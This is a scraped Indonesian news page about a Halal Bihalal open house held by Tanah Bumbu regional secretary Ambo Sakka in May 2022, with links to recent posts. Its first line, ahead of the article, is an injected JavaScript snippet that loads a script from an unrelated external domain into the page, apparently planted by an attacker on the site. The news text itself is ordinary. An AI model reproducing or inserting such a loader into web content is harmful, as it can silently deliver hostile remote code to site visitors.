(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Tanah Bumbu

Sekda Ambo Sakka Gelar Open dan Halal Bihalal House di Kediamannya


KANALKALIMANTAN.COM, BATULICIN – Melandainya kasus Covid-19 menjadi patokan bagi Pemerintah untuk memperbolehkan kegiatan Halal Bihalal atau silaturahmi pada perayaan Idul Fitri tahun ini.

Momen istimewa ini, dimanfaatkan jajaran pejabat di lingkup Pemerintah Kabupaten Tanah Bumbu termasuk Sekretaris Daerah (Sekda) H. Ambo Sakka yang menggelar halal bihalal atau Open House di kediamannya, Senin (2/5/2022) siang.

Sebelumnya Sekda juga berhadir dalam Open House yang juga digelar Bupati Tanah Bumbu HM Zairullah Azhar bertempat di Istana Anak Yatim sesuai melaksanakan Shalat Ied.

Di samping itu, tertuang dalam Surat Edaran Menteri Dalam Negeri (Mendagri) Republik Indonesia (RI) Nomor 003/2219/SJ terkait Pelaksanaan Halalbihalal pada Perayaan Idul Fitri Tahun 1443 Hijriah.

 

Baca juga  : Dua Tahun Pandemi, Akhirnya Shalat Ied Digelar Normal di Masjid Agung Al Munawwarah Banjarbaru

Dimana edaran tersebut mengatur tentang pembatasan jumlah tamu, penyediaan makanan, serta protokol kesehatan yang disesuaikan dengan level PPKM di masing-masing daerah.

Kegiatan Open House pun kini ini dirasa spesial mengingat di tahun sebelumnya tidak ada Open House yang digelar karena masih meningginya angka kasus Covid-19.

Tanah Bumbu yang saat ini berada di PPKM Level 1, membuat kegiatan yang menjadi sarana bersilaturrahmi umat Islam di hari Raya Idul Fitri ini dapat kembali diadakan dengan tetap berpedoman dengan protokol kesehatan.

Tampak Ambo Sakka dengan penuh suka cita menyalami, bermaaf-maafan dan bersilaturahmi dengan menyuguhkan hidangan kepada para tamu yang berhadir.

Turut hadir alim ulama, tokoh agama, tokoh masyarakat, Kepala SKPD, Tim Percepatan Pembangunan Tanah Bumbu dan tamu undangan. (kanalkalimantan.com/ftr)

Reporter : ftr
Editor : cell


Desy Arfianty

Recent Posts

Lesti Kejora Hingga Ria Ricis Siap Ramaikan Silet Awards 2024!

KANALKALIMANTAN.COM, - Ajang penghargaan paling dramatis dan paling sensasional yang ditunggu masyarakat, Silet Awards 2024… Read More

30 menit ago

Kontes Motor 2Tak “Entwosiastrokes Volume 2 2024” di Banjarbaru, Ajang Adu Para Modifikator Banua

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin mengapreasiasi penyelenggaraan event kontes motor "Entwosiastrokes… Read More

1 jam ago

Kali Pertama Airbus A340 Layani Jemaah Haji Embarkasi Banjarmasin

Penerbangan Kloter 1 Sempat Terlambat 30 Menit Read More

5 jam ago

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

8 jam ago

Embarkasi Haji Banjarmasin Berangkatkan Kloter 1, 320 Jemaah Menuju Madinah

KANALKALIMANTAN.COM, BANJARBARU - Jemaah haji Kloter pertama diberangkatkan dari Asrama Haji Embarkasi Banjarmasin di Banjarbaru,… Read More

8 jam ago

Dilakban di Paha, Empat Orang di Bandara Juwata Tarakan Selundupkan 4 Kg Sabu

KANALKALIMANTAN.COM, TARAKAN - Empat orang calon penumpang pesawat dengan rute Tarakan-Makassar batal berangkat lantaran kedapatan… Read More

22 jam ago

This website uses cookies.